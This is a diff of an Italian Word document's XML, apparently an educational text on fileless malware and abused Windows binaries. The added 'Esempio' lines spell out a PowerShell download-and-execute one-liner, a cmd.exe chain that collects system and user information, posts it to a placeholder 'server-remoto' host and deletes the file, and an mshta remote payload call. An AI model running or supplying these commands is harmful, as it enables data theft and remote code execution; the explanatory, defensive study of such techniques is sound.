+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>È il framework d’elezione per il malware fileless poiché integra nativamente il .NET e le API di sistema. La sua potenza risiede nell’</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -843,39 +821,148 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come il download del payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
+        <w:t>esecuzione in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>memory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: può scaricare, decifrare e avviare payload complessi direttamente nella RAM, senza che alcun file tocchi mai il disco (evitando così la scansione degli antivirus tradizionali).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>powershell.exe -NoP -W Hidden -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Exec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bypass -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "IEX (New-Object Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>).DownloadString</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="darkBlue"/>
+        </w:rPr>
+        <w:t>('http://server-remoto/payload.ps1')"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>mshta</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -883,122 +970,280 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>: Gestisce le HTML Applications (.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>hta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>VBScript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
+        <w:t>cmd.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come l’esfiltrazione di dati personali, il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>download</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egsvr32.exe: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>whitelist</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>• Rundll32.exe: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>cmd.exe /c "(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>hostname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ipconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>all</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>systeminfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp; net user) &gt; %TEMP%\info.txt &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bypass -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>Invoke-WebRequest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -Uri 'http://server-remoto/upload' -Method Post -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>InFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '%TEMP%\info.txt'" &amp; del %TEMP%\info.txt"</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1006,43 +1251,254 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Certutil.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Utile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per la gestione dei certificati digitali, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">potrebbe essere </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
-      </w:r>
+        <w:t>mshta.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Gestisce le HTML Applications (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VBScript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Esempio:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">mshta.exe   </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Collegamentoipertestuale"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+            <w:highlight w:val="black"/>
+          </w:rPr>
+          <w:t>http://server-remoto/payload.hta</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>regsvr32.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>whitelist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>undll32.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ertutil.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Utile per la gestione dei certificati digitali, potrebbe essere utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1066,6 +1522,8 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -1075,12 +1533,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -2194,6 +2646,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="47F0156F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1390FD74"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
